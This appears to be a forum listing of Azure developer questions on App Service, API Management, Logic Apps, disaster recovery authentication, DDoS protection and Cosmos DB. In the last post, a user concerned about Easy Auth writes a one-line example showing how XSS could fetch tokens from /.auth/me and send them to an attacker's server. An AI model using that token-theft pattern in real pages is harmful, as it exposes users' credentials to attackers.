Latest Discussions
Need help with Azure topics
Hello everyone! I have little knowledge on Azure - have completed AZ-900 certification. There's a project which requires knowledge on below topics:
1. Azure App Service
2. Function App
3. Logic App
4. API Management
5. Key Vault
6. App Insight
7. Redis Cache
8. Azure Service Bus
9. Event Hub
10. Event grid
I tried looking for tutorials on these topics in Google but could find none apart from that in Microsoft docs - however, I am not able to understand what all sub-topics I need to cover. I need your help in identifying some resources and what sub topics should I exactly look into - I would be getting interviewed on these topics in a month. I am trying my best to learn these topics and do little hands on so that I have basic idea about these services. I am a backend developer in .Net with around 4.5 years of experience. Any help would be highly appreciated. Thanks much in advance #azure #azurePaaS
MKar10 | Jun 26, 2021 | Copper Contributor | 2.4K Views | 0 likes | 4 Comments

Azure Logic Apps vs Power Automate
Hello Experts, Please guide me in selecting the more suitable option between Azure Logic Apps and Power Automate for developing an Enterprise application that operates on a scheduled basis. This application must interact with multiple on-premises and SaaS systems by making several REST API calls (approximately 8 - 10 calls) and storing the retrieved data (structural and unstructured). Thanks -Sri
DynamicsHulk | Dec 18, 2023 | Copper Contributor | 5.2K Views | 0 likes | 3 Comments

Downtime of API Management during deployment
Which actions will cause a downtime of Azure API Management so APIs will not be able to consume (Premium Tier)? E.g. changing network would be obviously. But what about deployments of APIs, Products, Scaling up and down... How can I find out which actions will make the APIs unavailable? Or is there a mechanism which will keep them available in each scenario (Even if "Service is being updated")? Thanks!
sampa611 | Nov 17, 2022 | Copper Contributor | 2.8K Views | 0 likes | 3 Comments

API Management Policy - Secure way to detect requests from Application Gateway
Hello. We got API Management which is reachable from internal network, and from external network (internet) via Application Gateway. I want to add an authorization policy in an API which only applies if requests are coming from external network. Microsoft recommends NOT to use Host Header because it can be modified by the user (https://learn.microsoft.com/en-us/azure/architecture/best-practices/host-name-preservation#context). Is there a secure way to check if requests are coming from external network? Would "Context.Request.OriginalUrl.Host" work for this - or is the value a copy of the Host Header? (https://learn.microsoft.com/en-us/azure/api-management/api-management-policy-expressions#ContextVariables)
sampa611 | Oct 20, 2022 | Copper Contributor | 2.7K Views | 0 likes | 3 Comments

AAD Users from main subscription can't login to the application after failing over the VMs
Hi Azure Folks! AAD users from main subscription can't login to the application after failing over the VMs to another region (via ASR). I'm working on a DR solution for an in-house developed application (consists of a Web server and a DB server in Azure VMs) to replicate across two regions. I've provisioned all resources in a separate Azure subscription (resource groups, VMs, Network interfaces etc.) however, when failed over to the DR via ASR, the application doesn't authenticate users from the main tenant (AAD users).
What's configured:
1. New isolated Subscription containing following resources
2. Shared services resource group
3. Dedicated resource group containing replica VM’s and PaaS resources.
4. Virtual Network for shared resources, DCs, jump hosts.
5. Isolated subnet containing replica domain controllers and shared services.
6. Isolated subnet for Azure Bastion hosts.
7. Isolated subnet to host replica VM’s and resources.
8. A dedicated host used to access isolated DR instance.
My question is, as DR resources are hosted in a totally separate/isolated subscription, would we need to consider other areas (i.e. app registration or integration between two subscriptions) in addition to the above list of items configured (to facilitate the authentication for all AAD users in the main subscription)? Am I missing something here? Thanks and appreciate any ideas! Cheers Manoj
Solved | 1.5K Views | 0 likes | 3 Comments

Does Azure provide DDoS protection for its PaaS services?
Hi, I am working on a project wherein we will deploy Storage Account, KeyVault, ServiceBus, CosmosDB, and SQL DB in our subscription. All these services will be deployed with public access enabled, and we will only add private endpoints for local VNet traffic. From a security perspective, should I explicitly add DDoS protection to the above-mentioned services, or do they come with built-in DDoS protection? Example: Would a DDoS attack be able to bring down a Storage Account Blob Service (test.blob.core.windows.net)?
pradeepchouhan | Jul 27, 2024 | Copper Contributor | 358 Views | 2 likes | 2 Comments

Connect to cosmosdb read-only database
I have a cosmosdb and it has a read-only replica in another region. How to connect to it using RBAC authentication (or using service principal)? Can I limit the RU based on this service principal? Is the RU used on this replica shared with the primary read-write replica? I am going to use python script from databricks to do so. Thanks
micmic430 | Jul 05, 2023 | Copper Contributor | 764 Views | 0 likes | 2 Comments

App Service Easy auth and disabling /.auth/me
I plan on using Easy Auth with an ASP.NET Core web application hosted on Azure App Service with the Linux flavor. From my understanding Easy Auth adds a couple of endpoints to the app service:
- /.auth/login/<provider>/callback
- /.auth/logout
- /.auth/me
Usually when I use OpenID Connect and OAuth 2.0 I always opt for the authorization code flow to avoid users having direct access to their tokens (id_token/access_token/refresh_token) as the backend is capable of handling this through cookies in the browser and tokens stored elsewhere away from the user. I have enabled Easy Auth with the token stored for my application and it works as expected. My question is mainly concerned with the /.auth/me endpoint. This endpoint exposes all the tokens, along with the claims of the user. If I enable scopes for offline_access then refresh_token is also exposed here. From a security perspective this seems horrible as a simple XSS attack could read the tokens and ship them off to an attacker's server.
    fetch("/.auth/me").then(r => r.json()).then(sendToMaliciousServer)
My questions are:
- Can I disable this endpoint in Easy Auth to avoid the security issue while still maintaining access to having a token store?
- Is MSAL (or rather Microsoft.Identity.Web) dependent on this endpoint to be able to read out the access_token from the token store of Easy Auth before calling downstream services?
Dzeneralen | Apr 14, 2023 | Copper Contributor | 50K Views | 0 likes | 2 Comments
Tags
- Azure Cloud Service (9 Topics)
- azure storage (9 Topics)
- azure api management (5 Topics)
- azure event hub (4 Topics)
- Azure Redis (3 Topics)
- Azure Service Fabric (3 Topics)
- azure resource manager (2 Topics)
- azure cache for redis (2 Topics)
- azure policy (2 Topics)
- azure service bus (2 Topics)